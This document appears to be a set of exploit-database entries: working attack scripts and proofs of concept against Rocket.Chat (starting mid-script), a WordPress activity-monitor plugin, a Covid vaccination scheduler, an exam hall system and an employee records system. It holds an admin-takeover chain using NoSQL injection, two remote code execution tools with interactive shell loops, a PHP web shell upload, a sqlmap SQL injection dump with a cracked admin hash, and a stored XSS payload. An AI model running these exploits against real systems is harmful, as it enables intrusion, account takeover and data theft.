json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print("[+] Succesfully authenticated as administrator") # Creating Integration payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' cookies = {'rc_uid': userid,'rc_token': token} headers = {'X-User-Id': userid,'X-Auth-Token': token} r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) data = r.text data = data.split(',') token = data[12] token = token[9:57] _id = data[18] _id = _id[7:24] # Triggering RCE u = url + '/hooks/' + _id + '/' +token r = requests.get(u) print(r.text) ############################################################ # Getting Low Priv user print(f"[+] Resetting {lowprivmail} password") ## Sending Reset Mail forgotpassword(lowprivmail,target) ## Getting reset token through blind nosql injection token = resettoken(target) ## Changing Password changingpassword(target,token) # Privilege Escalation to admin ## Getting secret for 2fa secret = twofactor(target,lowprivmail) ## Sending Reset mail print(f"[+] Resetting {adminmail} password") forgotpassword(adminmail,target) ## Getting admin reset token through nosql injection authenticated token = admin_token(target,lowprivmail) ## Resetting Password code = oathtool.generate_otp(secret) changingadminpassword(target,token,code) ## Authenticating and triggering rce while True: cmd = input("CMD:> ") code = oathtool.generate_otp(secret) rce(target,code,cmd)

# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2) # Date: 07.07.2021 # Exploit Author: Beren Kuday GORUN # Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/ # Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip # Version: 20161228 and possibly prior # Fixed version: 20180826 # CVE : CVE-2018-15877 """ ------------------------- Usage: ┌──(root@kali)-[~/tools] └─# python3 WordPress-Activity-Monitor-RCE.py What's your target IP? 192.168.101.28 What's your username? mark What's your password? password123 [*] Please wait... [*] Perfect! [email protected] whoami www-data [email protected] pwd /var/www/html/wp-admin [email protected] id uid=33(www-data) gid=33(www-data) groups=33(www-data) """ import requests from bs4 import BeautifulSoup def exploit(whoami, ip): while 1: cmd = input(whoami+"@"+ip+" ") url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools' payload = "google.com.tr | " + cmd data = {'ip': payload , 'lookup' : 'lookup' } x = requests.post(url, data = data, cookies=getCookie(ip)) html_doc = x.text.split("<p>Output from dig: </p>")[1] soup = BeautifulSoup(html_doc, 'html.parser') print(soup.p.text) def poc(ip): url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools' myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' } x = requests.post(url, data = myobj, cookies=getCookie(ip)) html_doc = x.text.split("<p>Output from dig: </p>")[1] soup = BeautifulSoup(html_doc, 'html.parser') print("[*] Perfect! ") exploit(soup.p.text, ip) def getCookie(ip): url = 'http://' + ip + '/wp-login.php' #log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1 data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'} x = requests.post(url, data = data) cookies = {} cookie = str(x.headers["Set-Cookie"]) for i in cookie.split(): if(i.find("wordpress") != -1 and i.find("=") != -1): cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1] return cookies ip = input("What's your target IP?\n") username = input("What's your username?\n") password = input("What's your password?\n") print("[*] Please wait...") poc(ip)

# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection # Date: 2021-07-07 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip # Version: 1.0 # Tested on: Windows 10, XAMPP ################ # Description # ################ The admin panel login can be assessed at http://{ip}/scheduler/admin/login.php. The username parameter is vulnerable to time-based SQL injection. Upon successful dumping the admin password hash, we can decrypt and obtain the plain-text password. Hence, we could authenticate as Administrator. ########### # PoC # ########### Run sqlmap to dump username and password: $ sqlmap -u "http://localhost/scheduler/classes/Login.php?f=login" --data="username=admin&password=blabla" --cookie="PHPSESSID=n3to3djqetf42c2e7l257kspi5" --batch --answers="crack=N,dict=N,continue=Y,quit=N" -D scheduler -T users -C username,password --dump ########### # Output # ########### Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 7551 FROM (SELECT(SLEEP(5)))QOUn) AND 'MOUZ'='MOUZ&password=blabla Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) web server operating system: Windows web application technology: PHP 5.6.24, Apache 2.4.23 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) current database: 'scheduler' Database: scheduler Table: users [1 entry] +----------+----------------------------------+ | username | password | +----------+----------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 | +----------+----------------------------------+ The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123

# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated) # Exploit Author: Davide 'yth1n' Bianchin # Contacts: davide dot bianchin at dedagroup dot it # Original PoC: https://exploit-db.com/exploits/50103 # Date: 06.07.2021 # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html # Version: 1.0 # Tested on: Kali Linux import requests from requests_toolbelt.multipart.encoder import MultipartEncoder import os import sys import string import random import time host = 'localhost' #CHANGETHIS path = 'SourceCode' #CHANGETHIS url = 'http://'+host+'/'+path+'/pages/save_user.php' def id_generator(size=6, chars=string.ascii_lowercase): return ''.join(random.choice(chars) for _ in range(size))+'.php' if len(sys.argv) == 1: print("#########") print("Usage: python3 examhallrce.py command") print("Usage: Use the char + to concatenate commands") print("Example: python3 examhallrce.py whoami") print("Example: python3 examhallrce.py ls+-la") print("#########") exit() filename = id_generator() print("Generated "+filename+ " file..") time.sleep(2) print("Uploading file..") time.sleep(2) def reverse(): command = sys.argv[1] multipart_data = MultipartEncoder({ 'image': (filename, '<?php system($_GET["cmd"]); ?>', 'application/octet-stream'), 'btn_save': '' }) r = requests.post(url, data=multipart_data, headers={'Content-Type':multipart_data.content_type}) endpoint = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'' urlo = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'?cmd='+command+'' print("Success, file correctly uploaded at: " +endpoint+ "") time.sleep(1) print("Executing command in 1 seconds:\n") time.sleep(1) os.system("curl -X GET "+urlo+"") reverse()

# Exploit Title: Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS) # Date: 07 July 2021 # Exploit Author: Subhadip Nag (mrl0s3r) # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/ # Tested on: Server: XAMPP # Description # Employee Record Management System 1.2 is vulnerable to stored cross site scripting (xss) in the Edit My Education because of insufficient user supplied data. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/ERMSP/erms/loginerms.php 2) Login: Login as a User(given username and password) 3) Go To Edit My Education and Edit My Exp 4) Enter the payload: <script>alert(1)</script> 5) Click Update 6) Go to 'My Education' option 7) Our XSS attack successful # PoC image 1) https://ibb.co/LS78xjX 2) https://ibb.co/9G0Pbxb